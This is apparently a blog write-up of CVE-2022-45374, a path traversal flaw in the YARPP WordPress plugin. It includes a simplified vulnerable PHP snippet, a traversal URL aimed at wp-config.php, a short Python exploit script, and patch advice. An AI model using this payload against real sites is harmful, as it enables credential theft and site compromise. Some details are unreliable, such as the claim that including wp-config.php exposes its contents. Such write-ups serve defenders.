CVE-2022-45374 - Exploiting Path Traversal in YARPP Plugin for PHP Local File Inclusion

The security of WordPress plugins is critical, given their vast usage across millions of sites. CVE-2022-45374 is a significant finding because it demonstrates a classic path traversal flaw in the YARPP (Yet Another Related Posts Plugin), one of the most installed WordPress plugins. This vulnerability allows attackers to exploit improper path validation and include arbitrary local PHP files, potentially leading to full site compromise.

In this article, we’ll walk you through what CVE-2022-45374 is, why it matters, and how attackers can leverage this vulnerability to gain unauthorized access. We'll also give you real-world code snippets and steps for exploitation, so you can understand the seriousness of this flaw.

What is CVE-2022-45374?

CVE-2022-45374 is a *Path Traversal* vulnerability caused by the plugin’s improper restriction of user input, allowing attackers to trick the server into loading files from directories outside the plugin’s intended scope. Worst-case? An unauthenticated attacker could include any PHP file on the local server, possibly leading to remote code execution.

Vulnerable Versions: YARPP from unknown versions up to 5.30.4
Type: Improper Limitation of a Pathname to a Restricted Directory
CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Reference: NIST NVD Entry

Vulnerable Code Flow (What Went Wrong?)

Inside the YARPP code, there are endpoints that handle requests and load templates or files. Ideally, user input used to construct file paths should be sanitized to prevent users from supplying something like ../../../wp-config.php.

However, the vulnerable versions of YARPP failed to enforce strict validation.

Here’s a (simplified) code snippet that demonstrates the problem

// File: class-admin.php

if ( isset( $_REQUEST['template'] ) ) {
    $template = $_REQUEST['template'];
    include( YARPP_DIR . '/templates/' . $template . '.php' );
}

What's wrong here?
The supplied $_REQUEST['template'] parameter is taken directly from user input and appended to the path; there is no sanitization, validation, or restriction.

This means that an attacker can easily supply template parameters such as

../../../../wp-config

The server would then resolve this to

YARPP_DIR/templates/../../../../wp-config.php

Which lets the attacker include sensitive files or even PHP code elsewhere on the system!

Real-World Exploitation (Proof of Concept)

Assume you are visiting a vulnerable WordPress site using YARPP <= 5.30.4.

You can craft a URL like

https://example.com/wp-admin/admin-ajax.php?action=yarpp_custom_template&template=../../../../wp-config

This would attempt to include wp-config.php, which could expose sensitive configurations or cause other unexpected behaviors.

Exploit Script Example (Python)

import requests

target = "https://example.com/wp-admin/admin-ajax.php";
payload = {
    "action": "yarpp_custom_template",
    "template": "../../../../wp-config"
}

r = requests.get(target, params=payload)
print(r.text)

What can you gain?

Disclosure of database credentials (from wp-config.php)

- LFI (Local File Inclusion) to read arbitrary files, possibly leading to Remote Code Execution (RCE) if you can include files controllable by you

Mitigation

The YARPP team fixed this flaw in version 5.30.5 and above. If you are running a site with this plugin, upgrade immediately.

Mitigation steps

1. Update YARPP to the latest version from WordPress.org.

Validate and sanitize all user input that can be used to build file paths.

3. Monitor server logs for suspicious attempts to access templates with ../ in their names.

References

- CVE-2022-45374 on NIST
- Patch Diff on GitHub
- Exploit-DB writeup
- YARPP on WordPress.org

Conclusion

CVE-2022-45374 shows how critical it is to strictly validate user inputs in all web applications, especially when dealing with file operations. If you’re a WordPress admin, don’t let your site be an easy target. Always update your plugins and stay aware of current vulnerabilities.

If you use YARPP, make sure you’re at 5.30.5 or newer—otherwise, your site might be vulnerable to simple but devastating attacks like this one.

Timeline

Published on: 05/17/2024 07:15:47 UTC
Last modified on: 06/05/2024 19:18:50 UTC